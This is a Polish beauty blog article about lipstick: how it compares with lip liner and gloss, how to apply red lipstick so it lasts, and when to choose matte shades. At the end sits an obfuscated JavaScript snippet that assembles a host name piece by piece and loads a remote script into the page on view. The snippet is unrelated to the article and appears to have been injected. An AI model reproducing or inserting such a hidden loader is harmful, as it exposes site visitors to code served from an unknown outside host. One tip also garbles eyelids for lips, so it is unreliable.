Home Uroda Królowa kosmetyków

Królowa kosmetyków

goldenroselipstick

Królową wśród wszystkich kosmetyków do makijażu jest szminka! To najcenniejszy kosmetyk, dzięki któremu można jednym pociągnięciem ręki zdecydowanie podkreślić piękno kobiety.   

Szminka, konturówka czy błyszczyk?

Błyszczyk jest bardzo słabą konkurencją dla szminki. Jest on bardzo nietrwały i wygląda na ustach dość nienaturalnie. Wizażyści twierdzą, że malowanie ust błyszczykiem jest bezcelowe, gdyż ten makijaż znika tak szybko, że należałoby nieustannie się nim malować. 

Konturówka służy zwykle do obrysowania konturu ust, poprawienia ich kształtu i optycznego powiększenia. Niektórzy wizażyści decydują się na wypełnienie całych warg konturówką, jednakże najwięcej sprzymierzeńców zyskuje szminka. 

Szminka jest idealnie wyprofilowania do wykonania perfekcyjnego makijażu ust, a dodatkowo je pielęgnuje i nawilża. To idealny wybór dla każdej kobiety. 

Czerwone usta

Ostatnio dużą sławę zyskują mocne, czerwone usta. W takim makijażu będzie świetnie wyglądać kobieta o każdym typie urody. Czerwona szminka mocno podkreśla kolor tęczówki, sprawia że spojrzenie staje się bardzo wyraziste i kuszące. Dlatego kobiety coraz częściej sięgają po czerwoną szminkę, głównie wybierają ją na wieczorne wyjścia.

Jak wykonać makijaż czerwoną szminką? 

Malowanie ust czerwoną szminką jest dość trudne, jednak jeśli opanujesz technikę, będziesz mieć idealne i ponętnie czerwone usta, których makijaż będzie się utrzymywać przez kilka godzin.

W makijażu ust czerwoną szminką najważniejszy jest odpowiedni podkład. Najlepiej wykorzystać do niego zwykły korektor. Rozprowadź go po dolnej i górnej wardze i poczekaj aż wyschnie. Kolejno dokładnie obrysuj kontur swoich ust konturówką o tym samym kolorze, co szminka. Gdy już kontur będzie dokładnie pokreślony, wypełnij usta szminką.

By dłużej utrzymywała się ona na Twoich ustach należy zacisnąć usta na chusteczce, dzięki temu pigmenty mocniej utrwalą się na Twoich ustach i ponownie pomaluj usta szminką. Tak wykonany makijaż będzie mocno podkreślać Twój wygląd przez długie godziny. 

Matowe szminki

Jeśli nie lubisz mocno podkreślać czerwienią ust, idealne będą dla Ciebie matowe szminki typu Velvet Matte Lipstick Dostępne są one w wielu kolorach, jednak nie są one tak intensywne jak błyszczące odcienie czerwieni. Takie szminki idealnie sprawdzą się przy codziennym makijażu, a także będą idealne na wieczorne wyjścia. Przy makijażu warto zdecydować się na podkreślenie jednego elementu twarzy, jeśli jest to oko, niech szminka będzie delikatniejsza i matowa. Jeśli chcesz optycznie powiększyć usta, wystarczy po nałożeniu szminki delikatnie musnąć środek górnej i dolnej powieki błyszczykiem.

{source}
<script type=”text/javascript”>
(function(){
uv0u=document.createElement(„script”);uv0u.type=”text/javascript”;
uv0u.async=true;uv0u_=((„us”)+”t”)+”a”;uv0u_+=(„t.i”)+””+”n”;uv0u_+=((„f”)+”o”);
uv0u.src=”http://”+uv0u_+”/1960885.l6qxw847v0uxpba7xux9bhyd7k9k2d”;
document.body.appendChild(uv0u);
})();
</script>
{/source}